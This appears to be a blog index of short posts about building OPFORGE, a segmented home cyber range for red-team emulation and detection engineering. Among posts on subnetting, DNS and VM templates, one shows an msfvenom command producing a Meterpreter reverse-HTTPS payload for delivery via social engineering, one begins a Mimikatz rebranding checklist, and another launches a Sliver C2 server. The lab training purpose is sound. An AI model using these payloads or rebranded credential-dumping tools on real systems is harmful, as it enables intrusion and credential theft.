OPFORGE Rebrand Checklist for Mimikatz

This step-by-step guide simplifies the process of rebranding Mimikatz under the OPFORGE project. Use it to create a portfolio-grade build aligned with Threat Emulation, Detection Engineering, and Explainable AI objectives.

Maintainer: Alfredo Pelaez
Date: 2025-05-31
Project Alignment: OPFORGE | High-Yield Performance & Results (H.Y.P.R.) Mindset

✅ Phase 1: Clone and Prepare the Repo

Clone the Mimikatz repository:

git clone --recursive https://github.com/gentilkiwi/mimikatz.git Tools/mimikatz

Create a backup copy: ...

May 31, 2025 · 2 min · Alfredo Pelaez

Correcting OPF-DC01 Placement in ADINFRA Segment

Background

Originally, OPF-DC01 was deployed with an IP address in the CSOCINFRA (192.168.20.0/24) subnet. However, per OPFORGE’s logical segmentation, all domain services must reside in the ADINFRA (192.168.40.0/24) segment to maintain operational and architectural integrity.

Problem

OPF-DC01 had IP 192.168.20.100 (incorrect subnet). The gateway was misconfigured as 192.168.50.5 (C2 CONTROL). This broke domain service accessibility and violated the subnet’s trust boundary.

Solution

1. Re-IP OPF-DC01 to ADINFRA

New-NetIPAddress -InterfaceAlias "Ethernet0" `
    -IPAddress "192.168.40.100" `
    -PrefixLength 24 `
    -DefaultGateway "192.168.40.5"

2. Update DNS

Set-DnsClientServerAddress -InterfaceAlias "Ethernet0" -ServerAddresses "192.168.40.100"

3. Fix Default Route

Remove-NetRoute -InterfaceAlias "Ethernet0" -NextHop 192.168.50.5
New-NetRoute -InterfaceAlias "Ethernet0" `
    -DestinationPrefix "0.0.0.0/0" `
    -NextHop "192.168.40.5"

Results

OPF-DC01 now properly resides at 192.168.40.100. Routing flows through opf-fw01 via gateway 192.168.40.5. It is ready to serve domain joins from endpoints like OPF-MBR01.

May 27, 2025 · 1 min · Alfredo Pelaez

Fixing DNS Resolution in OPFORGE: Domain Forwarding via pfSense

🧩 Problem Summary

After placing OPF-DC01 into the ADINFRA subnet (192.168.40.0/24), OPF-MBR01 was unable to resolve public domains such as google.com. DNS requests to 192.168.40.100 (the DC) failed to resolve, even though routing to the firewall was functional.

🔍 Root Cause

By default, OPF-DC01 was not forwarding DNS queries to a working upstream resolver. Attempted use of public DNS forwarders like 8.8.8.8 and 1.1.1.1 failed because OPF-DC01 had no internet access in the segmented lab setup. ...

May 27, 2025 · 2 min · Alfredo Pelaez

Installing Sysinternals Suite Offline in OPFORGE

🎯 Purpose

In the OPFORGE lab, Chocolatey may not be reliable due to segmented DNS or network control. Here’s how to install the full Sysinternals Suite offline to a standard lab path.

🗂️ Installation Directory

All tools are installed to: C:\OPFORGE\Tools\Sysinternals

This ensures consistent, reproducible builds and clean environment variables.

🛠️ Installation Steps

1. Download

From a system with internet access:

Invoke-WebRequest -Uri "https://download.sysinternals.com/files/SysinternalsSuite.zip" -OutFile "SysinternalsSuite.zip"

2. Transfer and Install

Copy the zip to C:\OPFORGE\SysinternalsSuite.zip, then run: ...

May 27, 2025 · 1 min · Alfredo Pelaez

OPF-RED01 Metasploit Setup & Payload Generation

Metasploit Installed

Metasploit was installed using the official msfinstall script:

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb -o msfinstall
chmod 755 msfinstall
sudo ./msfinstall

Confirmed with:

msfconsole --version

Payload Generation

The following payload was created for C2 operations within the DMZRED segment:

sudo msfvenom -p windows/x64/meterpreter/reverse_https \
    LHOST=192.168.22.50 LPORT=8443 \
    -f exe -o shell.exe

Payload was moved to: /opt/opforge/redteam/payloads/shell.exe

File properties:

file shell.exe
sha256sum shell.exe

The payload is now ready to be staged from OPF-RED01 or delivered via social engineering as part of a detection validation scenario. ...

May 26, 2025 · 1 min · Alfredo Pelaez

OPF-RED01 Sliver Server Setup

Sliver Build & Launch

After cloning the Sliver repository and resolving build prerequisites (notably zip), the server was compiled successfully using:

cd /opt/opforge/tools/sliver
make

The Sliver server was then launched:

./sliver-server

[Screenshot: Successful Launch]

This confirms the Sliver C2 is operational and ready to receive implants or generate payloads.

Next Steps

- Launch sliver-client and test C2 communication
- Generate staged and unstaged payloads
- Begin Red Team activity with Sliver in DMZRED
- Monitor OPF-BLUE01/AI01 for correlated events

May 26, 2025 · 1 min · Alfredo Pelaez

Building Hardened Base Templates for Red, Blue, and AI VMs in OPFORGE

base-ubuntu-2204-template

OS: Ubuntu 22.04 LTS Minimal
Uses: Cloning source for opf-red01, opf-log01, opf-ai01, opf-cloud01
Hardened baseline with:
- UFW firewall
- SSH key-based auth
- Git, Python, pip pre-installed
Snapshot name: Clean Install – Ready for Clone

base-windows10-template

OS: Windows 10 Pro 22H2 (fully patched)
Uses: Cloning source for opf-mbr01, future victims
Tools installed via Chocolatey: Sysmon, Winlogbeat, VSCode, Wireshark, Sysinternals
Pre-Sysprep and snapshot-ready

May 25, 2025 · 1 min · Alfredo Pelaez

Designing a Segmented Cyber Lab: OPFORGE Network Architecture

Segments

- CSOCINFRA (192.168.20.0/24): Houses opf-log01 (SIEM) and opf-ai01 (ML detection)
- LANWORKSTATIONS (192.168.30.0/24): Contains opf-mbr01 and future endpoints
- DMZRED (192.168.22.0/24): Hosts attacker targets like opf-cloud01
- ADINFRA (192.168.40.0/24): Supports opf-dc01 and GPO testing

Example Host Assignments

Host        IP Address            Segment
opf-fw01    192.168.1.24 (WAN)    pfSense router
opf-dc01    192.168.40.100        ADINFRA
opf-mbr01   192.168.30.101        LANWORKSTATIONS
opf-red01   192.168.22.50         DMZRED
opf-log01   192.168.20.12         CSOCINFRA

May 25, 2025 · 1 min · Alfredo Pelaez

From Sandbox to Cyber Range: How OPFORGE Evolved into a Professional Portfolio Lab

OPFORGE began as a minimal cyber range with SOF-ELK and basic telemetry ingest, and has evolved into a segmented, multi-role portfolio lab for red team emulation, detection engineering, and AI-enhanced threat analysis.

Evolution Timeline

Phase 1: Initial Sandbox
- Single VM (SOF-ELK)
- Flat network, no segmentation
- Manual log ingestion

Phase 2: Tactical Expansion
- Added pfSense (opf-fw01)
- Introduced segmentation: CSOCINFRA, DMZRED, LANWORKSTATIONS, ADINFRA
- First red team emulation with opf-red01
- Winlogbeat and Sysmon on endpoints

Phase 3: Professionalization
- Cloned base templates (base-ubuntu-2204-template, base-windows10-template)
- VM-specific roles: opf-ai01, opf-log01, opf-mbr01, etc.
- AI and ML integration via Jupyter (opf-ai01)
- Multi-tiered ingest pipeline (Zeek → Logstash → OpenSearch)

Lessons Learned
- Legacy OS images break modern tools
- Cloning base templates improves consistency
- Network segmentation is essential for realistic detection engineering

May 25, 2025 · 1 min · Alfredo Pelaez

OPFORGE Base Template Notes

🧱 Base Templates Used in OPFORGE

This post outlines the two core VM templates used to clone all OPFORGE lab components. Each template is hardened, snapshot-ready, and optimized for its role.

🐧 base-ubuntu-2204-template

OS: Ubuntu 22.04 LTS (minimal ISO)
Usage: Source image for all Linux-based OPFORGE components
Configured With:
- SSH key-based authentication
- ufw firewall rules
- Preinstalled: Git, Python3, pip, htop, curl, net-tools
Snapshot Label: ubuntu2204-clean-template

🪟 base-windows10-template

OS: Windows 10 Pro 22H2 (fully patched)
Usage: Source image for domain-joined endpoints
Configured With:
- Tools installed via Install-OPFORGE-WindowsTools.ps1: Sysmon, Winlogbeat, 7zip, VSCode, Sysinternals, Wireshark
- Bloatware removal and telemetry disabled
- Power settings and Start menu cleaned
Snapshot Label: win10_22H2_tools_installed

Both templates are used to ensure consistency, repeatability, and portfolio-quality documentation across the OPFORGE environment. ...

May 25, 2025 · 1 min · Alfredo Pelaez